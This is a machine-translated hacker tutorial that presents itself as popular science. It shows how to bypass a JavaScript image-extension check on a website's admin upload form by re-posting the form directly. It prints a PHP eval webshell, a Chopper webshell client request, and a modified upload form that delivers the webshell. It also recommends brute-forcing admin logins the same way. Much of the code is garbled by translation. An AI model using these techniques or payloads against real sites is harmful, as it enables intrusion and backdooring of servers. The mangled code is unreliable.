POST form and upload breakthrough JS suffix check analysis

 
This article is purely a popular science article. Before reading this article, please briefly understand the difference between GET and POST:
Website form receiving information submission method: Get and Post lecture
If you do not understand this article, or do not want to read it, let me give you a more simple introduction to GET and POST.
GET is reflected in the url. Generally, we encounter injection or file inclusion, most of which are in the GET mode, while remote password command execution, getshell vulnerabilities such as arbitrary file execution are mostly implemented in POST mode.
I have not generalized it. Injection also has many posts. For example, a typical universal password is POST injection.
So what is the difference between GET and POST?
GET is directly reflected in the url. For example, when x. php receives cmd variables in the GET mode, the format is/x. php? Cmd = xxxxx
While POST is a form, which is invisible, for example, x. when php receives cmd variables in POST mode, the url is still x. php, there is nothing behind it, but IE, safari, chrome and other browsers have actually completed data exchange through the <form> </form> tag on the webpage.
I think you should have understood it. If you don't understand it, continue to supplement html. This is the most basic http data exchange in html. Okay, let's get started.

First, let's look at a php sentence webshell:
 
 
<? Php
 
Eval ($ _ POST ['xxx']);
 
?>
Copy code
We usually use a single sentence client, such as a kitchen knife. But do you know how the kitchen knife works? Why is xxx a password ??
It's actually very simple.
Php uses the POST value to execute php code. If you execute the php code phpinfo (), the client will send the following data in one sentence:
 
 
POST/cmd.exe php HTTP/1.1
 
Host: blackbap.org
 
User-Agent: Chopper
 
Accept: text/xml, application/xml, application/xhtml + xml,
 
Text/html; q = 0.9, text/plain; q = 0.8, image/png, */*; q = 0.5
 
Accept-Language: zh-cn; q = 0.5
 
Accept-Encoding: gzip, deflate
 
Accept-Charset: gb2312; q = 0.7
 
Keep-Alive: 300
 
Referer: http://www.bkjia.com/cmd. php
 
Content-Type: application/x-www-form-urlencoded
 
Content-Length: 14
 
Xxx = phpinfo ()
Copy code
Let's look at the last row directly. Yes, this is the data sent by post.
If we capture packets, we will surely see such similar data packet sending
So, how does this data transmission work in a browser? Actually easier
 
 
<Form action = "http://blackbap.org/cmd.php" method = "POST">
 
<Input type = "text" id = "xxx" value = "phpinfo ()">
 
<Input type = "submit" value = "submit">
 
</Form>
Copy code
Save the upload code as xx.html and submit it. Then, the POST data captured in the above packet is sent.
We can see a relationship like this:
If the trojan contains one sentence:
 
 
$ Bl1 = $ _ POST ['biang1'];
 
$ Bl2 = $ _ POST ['bianliang2'];
 
$ Bl3 = $ _ POST ['biang3'];
 
.............
 
$ BlN = $ _ POST ['biangn'];
Copy code
In form, you can:
 
 
<Input type = "text" id = "bianliang1" value = "">
 
<Input type = "text" id = "bianliang2" value = "">
 
<Input type = "text" id = "bianliang3" value = "">
 
.....
 
<Input type = "text" id = "bianliangN" value = "">
Copy code
The end of the POST packet is:
Bianliang1 = xxxx & bianliang2 = xxxx & bianliang3 = xxxx &... bianliangN = xxxx
Well, this is simple.
So what do I want to talk about?
Let's look at this background:
 
 
<Script language = "javascript" type = "text/javascript">
 
Function val ()
 
{
 
If (document. addpro. album_title.value = "")
 
{
 
Alert ("Enter project title ");
 
Document. addpro. album_title.focus ();
 
Return false;
 
}
 
If (document. addpro. album_pos.value = "")
 
{
 
Alert ("select the position ");
 
Document. addpro. album_pos.focus ();
 
Return false;
 
}
 
If (document. addpro. album_image.value! = "")
 
{
 
Var img = document. addpro. album_image.value;
 
Var pos = img. lastIndexOf ('.');
 
If (pos <0)
 
{
 
Alert ("Unsupported image format ");
 
Document. addpro. album_image.focus ();
 
Return false;
 
}
 
If (pos> = 0)
 
{
 
Var mainext = img. substr (pos + 1 );
 
If (mainext! = 'Jpg ') & (mainext! = 'Jpg ') & (mainext! = 'Jpeg ') & (mainext! = 'Jpeg ') & (mainext! = 'Gif') & (mainext! = 'Gif') & (mainext! = 'Bmb') & (mainext! = 'Bmb') & (mainext! = 'Png ') & (mainext! = 'Png '))
 
{
 
Alert ("Unsupported image format ");
 
Document. addpro. album_image.focus ();
 
Return false;
 
}
 
}
 
}
 
}
 
</Script>
 
</Head>
 
<Form method = "post" enctype = "multipart/form-data" name = "addpro">
 
<Select>
 
<Option value = ""> Select the position </option>
 
<Option value = "1"> 1 </option>
 
<Option value = "Last"> Last </option>
 
</Select> </td>
 
<Input type = "file" name = "album_image"/> </td>
 
<Input type = "submit" name = "Submit" value = "ADD"/>
 
</Form>
Copy code
This is an example of an administrator who can right-click "add album" in the background to view the source code (with modifications and deletions). If you select a PHP file directly in the background, uploading it as the album cover will not work.
Because we can see a piece of code like this:
 
 
If (mainext! = 'Jpg ') & (mainext! = 'Jpg ') & (mainext! = 'Jpeg ') & (mainext! = 'Jpeg ') & (mainext! = 'Gif') & (mainext! = 'Gif') & (mainext! = 'Bmb') & (mainext! = 'Bmb') & (mainext! = 'Png ') & (mainext! = 'Png '))
Copy code
If the suffix is not jpg, JPG, jpeg, JPEG, gif, GIF, bmb, BMB, png, or PNG, it will fail.
So how does this JavaScript affect POST data?
The <form> tag contains the following sentence: onsubmit = "return val ();"
Yes, this is the code that allows form to execute Javascript.
The problem is that Javascript is executed by a local browser, that is, the person accessing the webpage. If I refuse to execute it, isn't it not restricted by his suffix?
This is too simple. Disabling JS in a browser is not a very good method. The most conservative method is:
 
 
<Form method = "post" action = "url address for uploading album images" enctype = "multipart/form-data">
 
<Select name = "position">
 
<Option value = ""> Select the position </option>
 
<Option value = "1"> 1 </option>
 
<Option value = "Last"> Last </option>
 
</Select> </td>
 
<Input type = "file" name = "album_image"/> </td>
 
<Input type = "submit" name = "Submit" value = "ADD"/>
 
</Form>
Copy code
Replace onsubmit with action, enter the url of the uploaded image, and save it as html of xxx and open it in a browser. Now, you can directly POST the PHP file.
As for packet capture, you can check whether it is
 
 
Position = Last & album_image = <? Php eval ($ _ POST [c]);?>
Copy code
After understanding the principle, we can also extend it. For example, if there is no verification code in the background, we just need to right-click the background login interface to view the "source code" and modify the action address, save as html, and then use a tool to brute force crack the background password by replacing the value.
There are POST background login box injection and so on: http://www.bkjia.com/Article/201112/115384.html
The experts who have read this article may be disappointed, but I started with the article, it's just a very simple thing.

Author: YoCo Smart from: Silic Group Hacker Army